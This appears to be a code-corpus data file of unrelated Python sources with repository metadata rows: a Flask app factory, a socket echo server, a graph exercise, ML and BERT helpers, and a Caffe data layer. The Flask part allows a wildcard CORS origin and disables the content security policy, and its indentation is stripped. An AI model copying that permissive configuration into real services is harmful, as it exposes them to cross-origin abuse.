def apply_pool_defaults(self, app, options):
super(SQLAlchemy, self).apply_pool_defaults(app, options)
options["pool_pre_ping"] = True
db = SQLAlchemy()
migrate = Migrate()
cors = CORS()
talisman = Talisman()
global_config = Config()
ip_ban = IpBan(ban_seconds=200, ban_count=global_config.IP_BAN_LIST_COUNT)
# logging
logger = logging.getLogger('frontend')
def create_app(config_class=None):
app = Flask(__name__)
if config_class is None:
config_class = Config()
app.config.from_object(config_class)
db.init_app(app)
migrate.init_app(app, db)
# TODO - Refine and update when build pipeline is stable. Get from global_config
cors.init_app(app, origins=["http://localhost:5000", "http://localhost:3000", '*'])
if app.config["ENV"] in ("staging", "production"):
# Secure the application and implement best practice https redirects and a content security policy
talisman.init_app(app, content_security_policy=None)
# ip_ban.init_app(app)
# ip_ban.load_nuisances(global_config.IP_BAN_REGEX_FILE)
from api.routes import bp as api_bp
app.register_blueprint(api_bp)
if not app.debug and not app.testing:
app.logger.addHandler(get_logger_handler())
@app.teardown_appcontext
def shutdown_session(exception=None):
db.session.remove()
return app
from api import models
| 32.377358 | 106 | 0.740093 | 238 | 1,716 | 5.105042 | 0.39916 | 0.044444 | 0.041152 | 0.027984 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007741 | 0.171911 | 1,716 | 52 | 107 | 33 | 0.847291 | 0.156177 | 0 | 0 | 0 | 0 | 0.058333 | 0 | 0 | 0 | 0 | 0.019231 | 0 | 1 | 0.078947 | false | 0 | 0.263158 | 0 | 0.394737 | 0.026316 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2967592aac9355f4e077c19d82c1790326f4a71b | 343 | py | Python | src/view/services_update_page.py | nbilbo/services_manager | 74e0471a1101305303a96d39963cc98fc0645a64 | [
"MIT"
] | null | null | null | src/view/services_update_page.py | nbilbo/services_manager | 74e0471a1101305303a96d39963cc98fc0645a64 | [
"MIT"
] | null | null | null | src/view/services_update_page.py | nbilbo/services_manager | 74e0471a1101305303a96d39963cc98fc0645a64 | [
"MIT"
] | null | null | null | from src.view.services_page import ServicesPage
from src.view.services_add_page import ServicesAddPage
class ServicesUpdatePage(ServicesAddPage):
def __init__(self, parent, *args, **kwargs):
super().__init__(parent, *args, **kwargs)
self.set_title("Update service")
self.set_confirm_button_text("Update")
| 34.3 | 54 | 0.723032 | 40 | 343 | 5.825 | 0.625 | 0.060086 | 0.094421 | 0.16309 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.172012 | 343 | 10 | 55 | 34.3 | 0.820423 | 0 | 0 | 0 | 0 | 0 | 0.05814 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.285714 | 0 | 0.571429 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2967c010afb3c90f1b88a872839f1b992255abcc | 272 | py | Python | playground/sockets/server.py | tunki/lang-training | 79b9f59a7187053f540f9057c585747762ca8890 | [
"MIT"
] | null | null | null | playground/sockets/server.py | tunki/lang-training | 79b9f59a7187053f540f9057c585747762ca8890 | [
"MIT"
] | 4 | 2020-03-10T19:20:21.000Z | 2021-06-07T15:39:48.000Z | proglangs-learning/python/example_sockets/server.py | helq/old_code | a432faf1b340cb379190a2f2b11b997b02d1cd8d | [
"CC0-1.0"
] | null | null | null | import socket
s = socket.socket()
s.bind(("localhost", 9999))
s.listen(1)
sc, addr = s.accept()
while True:
recibido = sc.recv(1024)
if recibido == "quit":
break
print "Recibido:", recibido
sc.send(recibido)
print "adios"
sc.close()
s.close()
| 13.6 | 31 | 0.617647 | 38 | 272 | 4.421053 | 0.605263 | 0.083333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042254 | 0.216912 | 272 | 19 | 32 | 14.315789 | 0.746479 | 0 | 0 | 0 | 0 | 0 | 0.099265 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.071429 | null | null | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
296855e3082fc927d6f123b69b223d9a6934f75b | 1,861 | py | Python | Graphs/ConnectedComponents.py | PK-100/Competitive_Programming | d0863feaaa99462b2999e85dcf115f7a6c08bb8d | [
"MIT"
] | 70 | 2018-06-25T21:20:15.000Z | 2022-03-24T03:55:17.000Z | Graphs/ConnectedComponents.py | An3sha/Competitive_Programming | ee7eadf51939a360d0b004d787ebabda583e92f0 | [
"MIT"
] | 4 | 2018-09-04T13:12:20.000Z | 2021-06-20T08:29:12.000Z | Graphs/ConnectedComponents.py | An3sha/Competitive_Programming | ee7eadf51939a360d0b004d787ebabda583e92f0 | [
"MIT"
] | 24 | 2018-12-26T05:15:32.000Z | 2022-01-23T23:04:54.000Z | #!/bin/python3
import math
import os
import random
import re
import sys
#
# Complete the 'countGroups' function below.
#
# The function is expected to return an INTEGER.
# The function accepts STRING_ARRAY related as parameter.
#
class Graph:
def __init__(self, V):
self.V = V
self.adj = [[] for i in range(V)]
def addEdge(self, a,b):
self.adj[a].append(b)
self.adj[b].append(a)
def dfs_util(self, temp, node, visited):
visited[node] = True
temp.append(node)
for i in self.adj[node]:
if not visited[i]:
temp = self.dfs_util(temp, i, visited)
return temp
def countGroups(self):
"""
This is the classical concept of connected components in a Graph
"""
visited = [False] * self.V
groups = []
for node in range(self.V):
if not visited[node]:
temp = []
groups.append(self.dfs_util(temp, node, visited))
return groups
def convertMatrixToGraph(mat):
"""
Accept the input which is an adjacency matrix and return a Graph, which is an adjacency list
"""
n = len(mat)
g = Graph(n)
for i in range(n):
for j in range(n):
if j > i and mat[i][j] == '1':
g.addEdge(i,j)
return g
def countGroups(related):
# Write your code here
graph = convertMatrixToGraph(related)
groups = graph.countGroups()
# print(groups)
return len(groups)
if __name__ == '__main__':
fptr = open(os.environ['OUTPUT_PATH'], 'w')
related_count = int(input().strip())
related = []
for _ in range(related_count):
related_item = input()
related.append(related_item)
result = countGroups(related)
fptr.write(str(result) + '\n')
fptr.close()
| 22.695122 | 96 | 0.576034 | 242 | 1,861 | 4.338843 | 0.371901 | 0.033333 | 0.017143 | 0.020952 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.00156 | 0.311123 | 1,861 | 81 | 97 | 22.975309 | 0.817473 | 0.189146 | 0 | 0 | 0 | 0 | 0.015732 | 0 | 0 | 0 | 0 | 0.012346 | 0 | 1 | 0.122449 | false | 0 | 0.102041 | 0 | 0.326531 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
29699db1cd4c1b7712dc1f31ae88eb868493c3ed | 1,597 | py | Python | recognition/ml_model.py | hurschler/pig-face-recognition | 5834f3c89448a645ee0eaf2bbdade064f0c4be93 | [
"Apache-2.0"
] | 1 | 2021-11-19T05:33:39.000Z | 2021-11-19T05:33:39.000Z | recognition/ml_model.py | hurschler/pig-face-recognition | 5834f3c89448a645ee0eaf2bbdade064f0c4be93 | [
"Apache-2.0"
] | null | null | null | recognition/ml_model.py | hurschler/pig-face-recognition | 5834f3c89448a645ee0eaf2bbdade064f0c4be93 | [
"Apache-2.0"
] | 1 | 2022-01-05T12:57:12.000Z | 2022-01-05T12:57:12.000Z | import logging.config
import util.logger_init
import numpy as np
import tensorflow as tf
from sklearn.metrics import confusion_matrix
from util.tensorboard_util import plot_confusion_matrix, plot_to_image
from tensorflow.python.keras.callbacks_v1 import TensorBoard
from keras import backend as K
class MlModel:
def get_model(self):
return self.model
def summary_print(self):
self.model.summary()
# Define your scheduling function
def scheduler(self, epoch):
return 0.001 * 0.95 ** epoch
def log_confusion_matrix(self, epoch, logs):
# Use the model to predict the values from the test_images.
test_pred_raw = self.model.predict(self.ml_data.x_test)
test_pred = np.argmax(test_pred_raw, axis=1)
# Calculate the confusion matrix using sklearn.metrics
cm = confusion_matrix(self.ml_data.y_test, test_pred)
figure = plot_confusion_matrix(cm, class_names=self.ml_data.pig_dict.values())
cm_image = plot_to_image(figure)
# Log the confusion matrix as an image summary.
with self.file_writer_cm.as_default():
tf.summary.image("Confusion Matrix", cm_image, step=epoch)
# Define TensorBoard callback child class
class LRTensorBoard(TensorBoard):
def __init__(self, log_dir, **kwargs): # add other arguments to __init__ if you need
super().__init__(log_dir=log_dir, **kwargs)
def on_epoch_end(self, epoch, logs=None):
logs = logs or {}
logs.update({'lr': K.eval(self.model.optimizer.lr)})
super().on_epoch_end(epoch, logs)
| 31.313725 | 89 | 0.708203 | 229 | 1,597 | 4.69869 | 0.41048 | 0.111524 | 0.027881 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.007098 | 0.206011 | 1,597 | 50 | 90 | 31.94 | 0.841483 | 0.170319 | 0 | 0 | 0 | 0 | 0.013678 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | false | 0 | 0.266667 | 0.066667 | 0.6 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
2970d09ae49d5ea0ddb5185266b5f2bed4f79bf9 | 300 | py | Python | hanibal/ans_escuela/tipo_colaborador.py | Christian-Castro/castro_odoo8 | 8247fdb20aa39e043b6fa0c4d0af509462ab3e00 | [
"Unlicense"
] | null | null | null | hanibal/ans_escuela/tipo_colaborador.py | Christian-Castro/castro_odoo8 | 8247fdb20aa39e043b6fa0c4d0af509462ab3e00 | [
"Unlicense"
] | null | null | null | hanibal/ans_escuela/tipo_colaborador.py | Christian-Castro/castro_odoo8 | 8247fdb20aa39e043b6fa0c4d0af509462ab3e00 | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
from openerp.osv import fields, osv
from openerp import models, fields, api, _
class Tipo_Colaborador(models.Model):
_name = 'tipo.colaborador'
_rec_name = 'name'
name=fields.Char(string='Nombre')
active=fields.Boolean(string='Activo',default=True) | 25 | 55 | 0.683333 | 38 | 300 | 5.263158 | 0.631579 | 0.11 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.004065 | 0.18 | 300 | 12 | 55 | 25 | 0.808943 | 0.07 | 0 | 0 | 0 | 0 | 0.115108 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.285714 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 |
2973ac2848fca5ea3493059da1e9b46b9746f3f2 | 17,005 | py | Python | utils/data_processing.py | LisaAnne/LocalizingMoments | b6a555c8134581305d0ed4716fbc192860e0b88c | [
"BSD-2-Clause"
] | 157 | 2017-08-04T21:56:46.000Z | 2022-03-05T13:49:02.000Z | utils/data_processing.py | Naman-Bhalla/LocalizingMoments | 618bebfe6c4b897e94770b8011d34aa45c941e62 | [
"BSD-2-Clause"
] | 19 | 2017-09-26T15:27:47.000Z | 2022-02-27T23:21:00.000Z | utils/data_processing.py | Naman-Bhalla/LocalizingMoments | 618bebfe6c4b897e94770b8011d34aa45c941e62 | [
"BSD-2-Clause"
] | 48 | 2017-08-08T11:18:39.000Z | 2021-11-15T04:20:33.000Z | import numpy as np
import sys
import os
sys.path.append('utils/')
from config import *
from utils import *
sys.path.append(pycaffe_dir)
import time
import pdb
import random
import pickle as pkl
import caffe
from multiprocessing import Pool
from threading import Thread
import random
import h5py
import itertools
import math
import re
glove_dim = 300
glove_path = 'data/glove.6B.%dd.txt' %glove_dim
#glove_path = 'data/glove_debug_path.txt' #for debugging
if glove_path == 'data/glove_debug_path.txt':
print "continue?"
pdb.set_trace()
possible_segments = [(0,0), (1,1), (2,2), (3,3), (4,4), (5,5)]
for i in itertools.combinations(range(6), 2):
possible_segments.append(i)
length_prep_word = 40
length_prep_character = 250
vocab_file = 'data/vocab_glove_complete.txt'
def word_tokenize(s):
sent = s.lower()
sent = re.sub('[^A-Za-z0-9\s]+',' ', sent)
return sent.split()
def sentences_to_words(sentences):
words = []
for s in sentences:
words.extend(word_tokenize(str(s.lower())))
return words
class glove_embedding(object):
''' Creates glove embedding object
'''
def __init__(self, glove_file=glove_path):
glove_txt = open(glove_file).readlines()
glove_txt = [g.strip() for g in glove_txt]
glove_vector = [g.split(' ') for g in glove_txt]
glove_words = [g[0] for g in glove_vector]
glove_vecs = [g[1:] for g in glove_vector]
glove_array = np.zeros((glove_dim, len(glove_words)))
glove_dict = {}
for i, w in enumerate(glove_words): glove_dict[w] = i
for i, vec in enumerate(glove_vecs):
glove_array[:,i] = np.array(vec)
self.glove_array = glove_array
self.glove_dict = glove_dict
self.glove_words = glove_words
class zero_language_vector(object):
def __init__(self, data):
self.dim = glove_dim
def get_vector_dim(self):
return self.dim
def get_vocab_size(self):
return 0
def preprocess(self, data):
embedding = np.zeros((self.get_vector_dim(),))
for d in data:
d['language_input'] = embedding
d['gt'] = (d['gt'][0], d['gt'][1])
return data
class recurrent_language(object):
def get_vocab_size(self):
return len(self.vocab_dict.keys())
def preprocess_sentence(self, words):
vector_dim = self.get_vector_dim()
sentence_mat = np.zeros((len(words), vector_dim))
count_words = 0
for i, w in enumerate(words):
try:
sentence_mat[count_words,:] = self.vocab_dict[w]
count_words += 1
except:
if '<unk>' in self.vocab_dict.keys():
sentence_mat[count_words,:] = self.vocab_dict['<unk>']
count_words += 1
else:
pass
sentence_mat = sentence_mat[:count_words]
return sentence_mat
def preprocess(self, data):
for d in data:
words = sentences_to_words([d['description']])
d['language_input'] = self.preprocess(words)
return data
class recurrent_word(recurrent_language):
def __init__(self, data):
self.data = data
vocab = open(vocab_file).readlines()
vocab = [v.strip() for v in vocab]
if '<unk>' not in vocab:
vocab.append('<unk>')
vocab_dict = {}
for i, word in enumerate(vocab):
vocab_dict[word] = i
self.vocab_dict = vocab_dict
def get_vector_dim(self):
return 1
class recurrent_embedding(recurrent_language):
def read_embedding(self):
print "Reading glove embedding"
embedding = glove_embedding(glove_path)
self.embedding = embedding
def get_vector_dim(self):
return glove_dim
def __init__(self, data):
self.read_embedding()
embedding = self.embedding
vector_dim = self.get_vector_dim()
self.data = data
self.data = data
vocab = open(vocab_file).readlines()
vocab = [v.strip() for v in vocab]
if '<unk>' in vocab:
vocab.remove('<unk>') #don't have an <unk> vector. Alternatively, could map to random vector...
vocab_dict = {}
for i, word in enumerate(vocab):
try:
vocab_dict[word] = embedding.glove_array[:,embedding.glove_dict[word]]
except:
print "%s not in glove embedding" %word
self.vocab_dict = vocab_dict
def preprocess(self, data):
vector_dim = self.get_vector_dim()
for d in data:
d['language_input'] = sentences_to_words([d['description']])
return data
def get_vocab_dict(self):
return self.vocab_dict
#Methods for extracting visual features
def feature_process_base(start, end, features):
return np.mean(features[start:end+1,:], axis = 0)
def feature_process_norm(start, end, features):
base_feature = np.mean(features[start:end+1,:], axis = 0)
return base_feature/(np.linalg.norm(base_feature) + 0.00001)
def feature_process_context(start, end, features):
feature_dim = features.shape[1]
full_feature = np.zeros((feature_dim*2,))
if np.sum(features[5,:]) > 0:
full_feature[:feature_dim] = feature_process_norm(0,6, features)
else:
full_feature[:feature_dim] = feature_process_norm(0,5, features)
full_feature[feature_dim:feature_dim*2] = feature_process_norm(start, end, features)
return full_feature
feature_process_dict = {'feature_process_base': feature_process_base,
'feature_process_norm': feature_process_norm,
'feature_process_context': feature_process_context,
}
class extractData(object):
""" General class to extract data.
"""
def increment(self):
#uses iteration, batch_size, data_list, and num_data to extract next batch identifiers
next_batch = [None]*self.batch_size
if self.iteration + self.batch_size >= self.num_data:
next_batch[:self.num_data-self.iteration] = self.data_list[self.iteration:]
next_batch[self.num_data-self.iteration:] = self.data_list[:self.batch_size -(self.num_data-self.iteration)]
random.shuffle(self.data_list)
self.iteration = self.num_data - self.iteration
else:
next_batch = self.data_list[self.iteration:self.iteration+self.batch_size]
self.iteration += self.batch_size
assert self.iteration > -1
assert len(next_batch) == self.batch_size
return next_batch
class extractLanguageFeatures(extractData):
def __init__(self, dataset, params, result=None):
self.data_list = range(len(dataset))
self.num_data = len(self.data_list)
self.dataset = dataset
self.iteration = 0
self.vocab_dict = params['vocab_dict']
self.batch_size = params['batch_size']
self.num_glove_centroids = self.vocab_dict.values()[0].shape[0]
self.T = params['sentence_length']
if isinstance(result, dict):
self.result = result
self.query_key = params['query_key']
self.cont_key = params['cont_key']
self.top_keys = [self.query_key, self.cont_key]
self.top_shapes = [(self.T, self.batch_size, self.num_glove_centroids),
(self.T, self.batch_size)]
else:
print "Will only be able to run in test mode"
def get_features(self, query):
feature = np.zeros((self.T, self.num_glove_centroids))
cont = np.zeros((self.T,))
len_query = min(len(query), self.T)
if len_query < len(query):
query = query[:len_query]
for count_word, word in enumerate(query):
try:
feature[-(len_query)+count_word,:] = self.vocab_dict[word]
except:
feature[-(len_query)+count_word,:] = np.zeros((glove_dim,))
cont[-(len_query-1):] = 1
assert np.sum(feature[:-len_query,:]) == 0
return feature, cont
def get_data_test(self, data):
query = data['language_input']
return self.get_features(query)
def get_data(self, next_batch):
data = self.dataset
query_mat = np.zeros((self.T, self.batch_size, self.num_glove_centroids))
cont = np.zeros((self.T, self.batch_size))
for i, nb in enumerate(next_batch):
query = data[nb]['language_input']
query_mat[:,i,:], cont[:,i] = self.get_features(query)
self.result[self.query_key] = query_mat
self.result[self.cont_key] = cont
class extractVisualFeatures(extractData):
def __init__(self, dataset, params, result):
self.data_list = range(len(dataset))
self.feature_process_algo = params['feature_process']
self.loc_feature = params['loc_feature']
self.num_data = len(self.data_list)
self.dataset = dataset
self.iteration = 0
self.loc = params['loc_feature']
loss_type = params['loss_type']
assert loss_type in ['triplet', 'inter', 'intra']
self.inter = False
self.intra = False
if loss_type in ['triplet', 'inter']:
self.inter = True
if loss_type in ['triplet', 'intra']:
self.intra = True
self.batch_size = params['batch_size']
self.num_glove_centroids = params['num_glove_centroids']
features_h5py = h5py.File(params['features'])
features = {}
for key in features_h5py.keys():
features[key] = np.array(features_h5py[key])
features_h5py.close()
self.features = features
assert self.feature_process_algo in feature_process_dict.keys()
self.feature_process = feature_process_dict[self.feature_process_algo]
self.feature_dim = self.feature_process(0,0,self.features[self.dataset[0]['video']]).shape[-1]
self.result = result
self.feature_key_p = params['feature_key_p']
self.feature_time_stamp_p = params['feature_time_stamp_p']
self.feature_time_stamp_n = params['feature_time_stamp_n']
self.top_keys = [self.feature_key_p, self.feature_time_stamp_p, self.feature_time_stamp_n]
self.top_shapes = [(self.batch_size, self.feature_dim),
(self.batch_size, 2),
(self.batch_size,2)]
if self.inter:
self.feature_key_inter = 'features_inter'
self.top_keys.append(self.feature_key_inter)
self.top_shapes.append((self.batch_size, self.feature_dim))
if self.intra:
self.feature_key_intra = 'features_intra'
self.top_keys.append(self.feature_key_intra)
self.top_shapes.append((self.batch_size, self.feature_dim))
self.possible_annotations = possible_segments
def get_data_test(self, d):
video_feats = self.features[d['video']]
features = np.zeros((len(self.possible_annotations), self.feature_dim))
loc_feats = np.zeros((len(self.possible_annotations), 2))
for i, p in enumerate(self.possible_annotations):
features[i,:] = self.feature_process(p[0], p[1], video_feats)
loc_feats[i,:] = [p[0]/6., p[1]/6.]
return features, loc_feats
def get_data(self, next_batch):
feature_process = self.feature_process
data = self.dataset
features_p = np.zeros((self.batch_size, self.feature_dim))
if self.inter: features_inter = np.zeros((self.batch_size, self.feature_dim))
if self.intra: features_intra = np.zeros((self.batch_size, self.feature_dim))
features_time_stamp_p = np.zeros((self.batch_size, 2))
features_time_stamp_n = np.zeros((self.batch_size, 2))
for i, nb in enumerate(next_batch):
rint = random.randint(0,len(data[nb]['times'])-1)
gt_s = data[nb]['times'][rint][0]
gt_e = data[nb]['times'][rint][1]
possible_n = list(set(self.possible_annotations) - set(((gt_s,gt_e),)))
random.shuffle(possible_n)
n = possible_n[0]
assert n != (gt_s, gt_e)
video = data[nb]['video']
feats = self.features[video]
if self.inter:
other_video = data[nb]['video']
while (other_video == video):
other_video_index = int(random.random()*len(data))
other_video = data[other_video_index]['video']
feats_inter = self.features[other_video]
features_p[i,:] = feature_process(gt_s, gt_e, feats)
if self.intra:
features_intra[i,:] = feature_process(n[0], n[1], feats)
if self.inter:
try:
features_inter[i,:] = feature_process(gt_s, gt_e, feats_inter)
except:
pdb.set_trace()
if self.loc:
features_time_stamp_p[i,0] = gt_s/6.
features_time_stamp_p[i,1] = gt_e/6.
features_time_stamp_n[i,0] = n[0]/6.
features_time_stamp_n[i,1] = n[1]/6.
else:
features_time_stamp_p[i,0] = 0
features_time_stamp_p[i,1] = 0
features_time_stamp_n[i,0] = 0
features_time_stamp_n[i,1] = 0
assert not math.isnan(np.mean(self.features[data[nb]['video']][n[0]:n[1]+1,:]))
assert not math.isnan(np.mean(self.features[data[nb]['video']][gt_s:gt_e+1,:]))
self.result[self.feature_key_p] = features_p
self.result[self.feature_time_stamp_p] = features_time_stamp_p
self.result[self.feature_time_stamp_n] = features_time_stamp_n
if self.inter:
self.result[self.feature_key_inter] = features_inter
if self.intra:
self.result[self.feature_key_intra] = features_intra
class batchAdvancer(object):
def __init__(self, extractors):
self.extractors = extractors
self.increment_extractor = extractors[0]
def __call__(self):
#The batch advancer just calls each extractor
next_batch = self.increment_extractor.increment()
for e in self.extractors:
e.get_data(next_batch)
class python_data_layer(caffe.Layer):
""" General class to extract data.
"""
def setup(self, bottom, top):
random.seed(10)
self.params = eval(self.param_str)
params = self.params
assert 'top_names' in params.keys()
#set up prefetching
self.thread_result = {}
self.thread = None
self.setup_extractors()
self.batch_advancer = batchAdvancer(self.data_extractors)
shape_dict = {}
self.top_names = []
for de in self.data_extractors:
for top_name, top_shape in zip(de.top_keys, de.top_shapes):
shape_dict[top_name] = top_shape
self.top_names.append((params['top_names'].index(top_name), top_name))
self.dispatch_worker()
self.top_shapes = [shape_dict[tn[1]] for tn in self.top_names]
print 'Outputs:', self.top_names
if len(top) != len(self.top_names):
raise Exception('Incorrect number of outputs (expected %d, got %d)' %
(len(self.top_names), len(top)))
self.join_worker()
#for top_index, name in enumerate(self.top_names.keys()):
top_count = 0
for top_index, name in self.top_names:
shape = self.top_shapes[top_count]
print 'Top name %s has shape %s.' %(name, shape)
top[top_index].reshape(*shape)
top_count += 1
def reshape(self, bottom, top):
pass
def forward(self, bottom, top):
if self.thread is not None:
self.join_worker()
for top_index, name in self.top_names:
top[top_index].data[...] = self.thread_result[name]
self.dispatch_worker()
def dispatch_worker(self):
assert self.thread is None
self.thread = Thread(target=self.batch_advancer)
self.thread.start()
def join_worker(self):
assert self.thread is not None
self.thread.join()
self.thread = None
def backward(self, top, propoagate_down, bottom):
pass
feature_process_dict = {'feature_process_base': feature_process_base,
'feature_process_norm': feature_process_norm,
'feature_process_context': feature_process_context,
}
language_feature_process_dict = {'zero_language': zero_language_vector,
'recurrent_embedding': recurrent_embedding}
class dataLayer_ExtractPairedLanguageVision(python_data_layer):
def setup_extractors(self):
assert 'top_names' in self.params.keys()
assert 'descriptions' in self.params.keys()
assert 'features' in self.params.keys()
if 'batch_size' not in self.params.keys(): self.params['batch_size'] = 120
self.params['query_key'] = 'query'
self.params['feature_key_n'] = 'features_n'
self.params['feature_key_p'] = 'features_p'
self.params['feature_key_t'] = 'features_t'
self.params['feature_time_stamp_p'] = 'features_time_stamp_p'
self.params['feature_time_stamp_n'] = 'features_time_stamp_n'
self.params['cont_key'] = 'cont'
language_extractor_fcn = extractLanguageFeatures
visual_extractor_fcn = extractVisualFeatures
language_process = recurrent_embedding
data_orig = read_json(self.params['descriptions'])
random.shuffle(data_orig)
language_processor = language_process(data_orig)
data = language_processor.preprocess(data_orig)
self.params['vocab_dict'] = language_processor.vocab_dict
num_glove_centroids = language_processor.get_vector_dim()
self.params['num_glove_centroids'] = num_glove_centroids
visual_feature_extractor = visual_extractor_fcn(data, self.params, self.thread_result)
textual_feature_extractor = language_extractor_fcn(data, self.params, self.thread_result)
self.data_extractors = [visual_feature_extractor, textual_feature_extractor]
| 32.267552 | 114 | 0.673625 | 2,388 | 17,005 | 4.536013 | 0.110134 | 0.045236 | 0.026403 | 0.017264 | 0.39014 | 0.334195 | 0.224612 | 0.181222 | 0.126569 | 0.098781 | 0 | 0.008882 | 0.205528 | 17,005 | 526 | 115 | 32.328897 | 0.792894 | 0.021641 | 0 | 0.238213 | 0 | 0 | 0.069793 | 0.009875 | 0 | 0 | 0 | 0 | 0.034739 | 0 | null | null | 0.007444 | 0.042184 | null | null | 0.014888 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
2976116c00e8fbc7eadad3295e61cb99c5280023 | 3,018 | py | Python | hoogberta/encoder.py | KateSatida/HoogBERTa_SuperAI2 | e903054bc752a50c391ab610507fdeccc4f5d482 | [
"MIT"
] | null | null | null | hoogberta/encoder.py | KateSatida/HoogBERTa_SuperAI2 | e903054bc752a50c391ab610507fdeccc4f5d482 | [
"MIT"
] | null | null | null | hoogberta/encoder.py | KateSatida/HoogBERTa_SuperAI2 | e903054bc752a50c391ab610507fdeccc4f5d482 | [
"MIT"
] | null | null | null | from .trainer.models import MultiTaskTagger
from .trainer.utils import load_dictionaries,Config
from .trainer.tasks.multitask_tagging import MultiTaskTaggingModule
from fairseq.data.data_utils import collate_tokens
from attacut import tokenize
class HoogBERTaEncoder(object):
def __init__(self,layer=12,cuda=False,base_path="."):
args = Config(base_path=base_path)
self.base_path = base_path
self.pos_dict, self.ne_dict, self.sent_dict = load_dictionaries(self.base_path)
self.model = MultiTaskTagger(args,[len(self.pos_dict), len(self.ne_dict), len(self.sent_dict)])
if cuda == True:
self.model = self.model.cuda()
def extract_features(self,sentence):
all_sent = []
sentences = sentence.split(" ")
for sent in sentences:
all_sent.append(" ".join(tokenize(sent)).replace("_","[!und:]"))
sentence = " _ ".join(all_sent)
tokens = self.model.bert.encode(sentence).unsqueeze(0)
all_layers = self.model.bert.extract_features(tokens, return_all_hiddens=True)
return tokens[0], all_layers[-1][0]
def extract_features_batch(self,sentenceL):
inputList = []
for sentX in sentenceL:
sentences = sentX.split(" ")
all_sent = []
for sent in sentences:
all_sent.append(" ".join(tokenize(sent)).replace("_","[!und:]"))
sentence = " _ ".join(all_sent)
inputList.append(sentence)
batch = collate_tokens([self.model.bert.encode(sent) for sent in inputList], pad_idx=1)
#tokens = self.model.bert.encode(inputList)
return self.extract_features_from_tensor(batch)
def extract_features_from_tensor(self,batch):
all_layers = self.model.bert.extract_features(batch, return_all_hiddens=True)
return batch, all_layers[-1]
def extract_features2(self,sentence):
# all_sent = []
# sentences = sentence.split(" ")
# for sent in sentences:
# all_sent.append(" ".join(tokenize(sent)).replace("_","[!und:]"))
# sentence = " _ ".join(all_sent)
tokens = self.model.bert.encode(sentence).unsqueeze(0)
all_layers = self.model.bert.extract_features(tokens, return_all_hiddens=True)
return tokens[0], all_layers[-1][0]
def extract_features_batch2(self,sentenceL):
# inputList = []
# for sentX in sentenceL:
# sentences = sentX.split(" ")
# all_sent = []
# for sent in sentences:
# all_sent.append(" ".join(tokenize(sent)).replace("_","[!und:]"))
# sentence = " _ ".join(all_sent)
# inputList.append(sentence)
batch = collate_tokens([self.model.bert.encode(sent) for sent in sentenceL], pad_idx=1)
#tokens = self.model.bert.encode(inputList)
return self.extract_features_from_tensor(batch)
| 38.202532 | 103 | 0.61829 | 348 | 3,018 | 5.146552 | 0.198276 | 0.060302 | 0.065327 | 0.063652 | 0.685092 | 0.648241 | 0.648241 | 0.627582 | 0.627582 | 0.627582 | 0 | 0.006702 | 0.258449 | 3,018 | 78 | 104 | 38.692308 | 0.793566 | 0.169317 | 0 | 0.372093 | 0 | 0 | 0.010835 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.139535 | false | 0 | 0.116279 | 0 | 0.395349 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
